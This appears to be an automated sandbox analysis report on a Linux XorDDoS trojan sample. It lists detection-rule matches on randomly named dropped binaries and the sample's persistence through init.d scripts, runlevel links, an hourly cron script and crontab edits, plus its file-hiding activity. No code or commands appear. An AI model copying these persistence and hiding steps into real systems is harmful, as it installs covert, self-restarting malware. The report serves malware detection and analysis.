            Source: /usr/bin/wdcujvrbpo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/wdcujvrbpo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/dezqblvxuy, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/dezqblvxuy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/dezqblvxuy, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/chdmwyeiia, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/chdmwyeiia, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/chdmwyeiia, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/ckxgqrmzxa, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/ckxgqrmzxa, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/ckxgqrmzxa, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/lsodknzpps, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/lsodknzpps, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/lsodknzpps, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/eoqlmyvucn, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/eoqlmyvucn, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/eoqlmyvucn, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/cjfywultqo, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/cjfywultqo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/cjfywultqo, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: /usr/bin/zbksjhrfms, type: DROPPEDMatched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
            Source: /usr/bin/zbksjhrfms, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
            Source: /usr/bin/zbksjhrfms, type: DROPPEDMatched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
            Source: ELF static info symbol of initial sample.symtab present: no
            Source: classification engineClassification label: mal100.troj.evad.lin@0/22@2/0
            Source: /tmp/iJl2Sb6qRa (PID: 9452)/run/gcc.pid: wxonqlgszefidbvrcsmgiiobjjsjodcnJump to behavior

            Persistence and Installation Behavior

            barindex
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc1.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc2.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc3.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc4.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc5.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc.d/rc1.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc.d/rc2.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc.d/rc3.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc.d/rc4.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/rc.d/rc5.d/S90iJl2Sb6qRa -> /etc/init.d/iJl2Sb6qRaJump to behavior
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/rc1.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRaJump to behavior
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/rc2.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRaJump to behavior
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/rc3.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRaJump to behavior
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/rc4.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRaJump to behavior
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/rc5.d/S01iJl2Sb6qRa -> ../init.d/iJl2Sb6qRaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/cron.hourly/gcc.shJump to behavior
            Source: /bin/dash (PID: 9474)File: /etc/crontabJump to behavior
            Source: /bin/sed (PID: 9479)File: /etc/crontabJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /lib/libudev.soJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/lsodknzppsJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/cjfywultqoJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/ckxgqrmzxaJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/dezqblvxuyJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/hgfzmygnbxJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/lnmgbribvbJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/wdcujvrbpoJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/zbksjhrfmsJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/eoqlmyvucnJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/wzhmvohlxsJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/hiueshutolJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/mhvrcmaysvJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/chdmwyeiiaJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File written: /usr/bin/emnaztxelbJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)Shell script file created: /etc/cron.hourly/gcc.shJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)Reads from proc file: /proc/statJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)Reads from proc file: /proc/meminfoJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)Reads from proc file: /proc/cpuinfoJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9421/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9421/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9587/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9620/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9620/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9665/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3485/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3485/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3484/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3484/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1062/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1062/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3482/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3482/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3481/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3481/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1060/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1060/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9383/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9383/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3479/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3479/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3512/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3512/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3477/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3477/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1452/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1452/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3432/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3432/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3632/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3632/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3678/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3678/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3518/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3518/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1339/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1339/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9554/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9598/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9631/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9631/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9675/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3497/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3497/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3133/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3133/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3452/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3452/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3496/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3496/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1072/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1072/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3491/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3491/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3527/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3527/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1346/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1346/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3524/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3524/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3601/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3601/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3523/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3523/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1024/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1024/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1145/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1145/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3488/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3488/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3565/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3565/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3289/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3289/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3443/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3443/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9709/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3606/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3606/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/2516/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/2516/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9565/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9642/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9642/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/9686/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1363/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1363/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3541/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3541/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3463/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3463/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1362/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1362/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/2251/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/2251/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3262/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3262/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1084/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/1084/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3380/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/3380/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/496/fdJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File opened: /proc/496/fdJump to behavior
            Source: /usr/sbin/update-rc.d (PID: 9543)Systemctl executable: /bin/systemctl -> systemctl daemon-reloadJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)Writes shell script file to disk with an unusual file extension: /etc/init.d/iJl2Sb6qRaJump to dropped file

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /etc/init.d/iJl2Sb6qRaJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/lsodknzppsJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/cjfywultqoJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/ckxgqrmzxaJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/dezqblvxuyJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/hgfzmygnbxJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/lnmgbribvbJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/wdcujvrbpoJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/zbksjhrfmsJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/eoqlmyvucnJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/wzhmvohlxsJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/hiueshutolJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/mhvrcmaysvJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/chdmwyeiiaJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/emnaztxelbJump to dropped file
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/init.d/.depend.bootJump to dropped file
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/init.d/.depend.startJump to dropped file
            Source: /usr/lib/insserv/insserv (PID: 9490)File: /etc/init.d/.depend.stopJump to dropped file
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/lsodknzppsJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/cjfywultqoJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/ckxgqrmzxaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/dezqblvxuyJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/hgfzmygnbxJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/lnmgbribvbJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/wdcujvrbpoJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/zbksjhrfmsJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/eoqlmyvucnJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/wzhmvohlxsJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/hiueshutolJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/mhvrcmaysvJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/chdmwyeiiaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/emnaztxelbJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/yimgbvpxreJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/hjqubeqdgtJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/tqltcdysxmJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/ppcowopkhoJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/fzsohllyiaJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/qkefrqjuafJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/rbihsknkpvJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/eqbvlwquueJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/xjmgjvgxwoJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/hazvgjwinhJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/uriorqqkrkJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/tchbigxommJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/inquziyqfhJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/hzocakrfjcJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/eyvooyilzgJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/yklepkdsaiJump to behavior
            Source: /tmp/iJl2Sb6qRa (PID: 9452)File: /usr/bin/gacoxqlwsiJump to behavior
            Source: /usr/bin/lsodknzpps (PID: 9554)File: /usr/bin/lsodknzppsJump to behavior
            Source: /usr/bin/lsodknzpps (PID: 9565)File: /usr/bin/lsodknzppsJump to behavior
            Source: /usr/bin/lsodknzpps (PID: 9576)File: /usr/bin/lsodknzppsJump to behavior
            Source: /usr/bin/lsodknzpps (PID: 9587)File: /usr/bin/lsodknzppsJump to behavior
            Source: /usr/bin/lsodknzpps (PID: 9598)File: /usr/bin/lsodknzppsJump to behavior
            Source: /usr/bin/cjfywultqo (PID: 9609)File: /usr/bin/cjfywultqoJump to behavior
            Source: /usr/bin/cjfywultqo (PID: 9620)File: /usr/bin/cjfywultqoJump to behavior
            Source: /usr/bin/cjfywultqo (PID: 9631)File: /usr/bin/cjfywultqoJump to behavior
            Source: /usr/bin/cjfywultqo (PID: 9642)File: /usr/bin/cjfywultqoJump to behavior
            Source: /usr/bin/cjfywultqo (PID: 9653)File: /usr/bin/cjfywultqoJump to behavior
            Source: /usr/bin/ckxgqrmzxa (PID: 9665)File: /usr/bin/ckxgqrmzxaJump to behavior
            Source: /usr/bin/ckxgqrmzxa (PID: 9675)File: /usr/bin/ckxgqrmzxaJump to behavior
            Source: /usr/bin/ckxgqrmzxa (PID: 9686)File: /usr/bin/ckxgqrmzxaJump to behavior
            Source: /usr/bin/ckxgqrmzxa (PID: 9698)File: /usr/bin/ckxgqrmzxaJump to behavior
            Source: /usr/bin/ckxgqrmzxa (PID: 9709)File: /usr/bin/ckxgqrmzxaJump to behavior
